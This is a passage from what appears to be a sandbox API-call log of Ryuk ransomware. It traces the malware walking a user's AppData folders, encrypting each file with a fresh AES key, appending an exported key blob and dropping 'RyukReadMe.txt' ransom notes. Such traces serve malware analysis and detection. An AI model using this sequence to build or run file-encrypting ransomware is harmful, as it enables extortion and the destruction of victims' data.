pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.534] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.534] CloseHandle (hObject=0x198) returned 1 [0147.550] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.554] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.554] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.555] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", dwFileAttributes=0x80) returned 1 [0147.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.555] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=398) returned 1 [0147.555] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=398) returned 1 [0147.555] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.555] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.556] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.556] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.556] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.556] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.556] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e, lpOverlapped=0x0) returned 1 [0147.556] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.556] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.556] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.556] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.556] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.557] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.557] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.557] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.557] CloseHandle (hObject=0x198) returned 1 [0147.583] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.587] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.588] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.588] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", dwFileAttributes=0x80) returned 1 [0147.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.588] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=416) returned 1 [0147.588] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=416) returned 1 [0147.588] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.589] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.589] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.589] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.589] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.589] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.590] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.590] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.590] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0147.590] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.590] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0147.590] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.590] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.590] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.590] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.590] CloseHandle (hObject=0x198) returned 1 [0147.607] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.611] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.611] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.612] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.612] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76", dwFileAttributes=0x80) returned 1 [0147.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.612] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=252) returned 1 [0147.612] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=252) returned 1 [0147.612] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.612] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.613] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.613] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xfc, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.613] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xfc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x100) returned 1 [0147.613] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.614] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x100, lpOverlapped=0x0) returned 1 [0147.614] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.614] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.614] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.614] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.614] CloseHandle (hObject=0x198) returned 1 [0147.687] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.692] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.692] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0147.692] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0147.692] SetLastError (dwErrCode=0x0) [0147.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.693] GetLastError () returned 0x0 [0147.693] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0147.694] CloseHandle (hObject=0x194) returned 1 [0147.694] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.694] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.694] SetLastError (dwErrCode=0x0) [0147.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.694] GetLastError () returned 0xb7 [0147.694] CloseHandle (hObject=0x190) returned 1 [0147.695] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.695] SetLastError (dwErrCode=0x0) [0147.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.695] GetLastError () returned 0xb7 [0147.695] CloseHandle (hObject=0x190) returned 1 [0147.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.696] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.696] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.696] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.696] SetLastError (dwErrCode=0x0) [0147.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ime12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.696] GetLastError () returned 0x0 [0147.696] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0147.697] CloseHandle (hObject=0x190) returned 1 [0147.697] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.697] SetLastError (dwErrCode=0x0) [0147.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.697] GetLastError () returned 0xb7 [0147.697] CloseHandle (hObject=0x190) returned 1 [0147.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.697] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.697] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.697] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.698] SetLastError (dwErrCode=0x0) [0147.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.698] GetLastError () returned 0x0 [0147.698] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0147.699] CloseHandle (hObject=0x190) returned 1 [0147.699] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.699] SetLastError (dwErrCode=0x0) [0147.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.699] GetLastError () returned 0xb7 [0147.699] CloseHandle (hObject=0x190) returned 1 [0147.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.699] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.699] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.699] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.699] SetLastError (dwErrCode=0x0) [0147.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp8_1\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.699] GetLastError () returned 0x0 [0147.700] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0147.700] CloseHandle (hObject=0x190) returned 1 [0147.700] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.700] SetLastError (dwErrCode=0x0) [0147.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.701] GetLastError () returned 0xb7 [0147.701] CloseHandle (hObject=0x190) returned 1 [0147.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.701] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.701] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.701] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.701] SetLastError (dwErrCode=0x0) [0147.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp9_0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.702] GetLastError () returned 0x0 [0147.702] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0147.702] CloseHandle (hObject=0x190) returned 1 [0147.703] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.703] SetLastError (dwErrCode=0x0) [0147.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.703] GetLastError () returned 0xb7 [0147.703] CloseHandle (hObject=0x190) returned 1 [0147.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.704] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.704] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.704] SetLastError (dwErrCode=0x0) [0147.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.704] GetLastError () returned 0x0 [0147.704] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0147.705] CloseHandle (hObject=0x194) returned 1 [0147.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0147.705] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.705] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.705] SetLastError (dwErrCode=0x0) [0147.705] CreateFileW 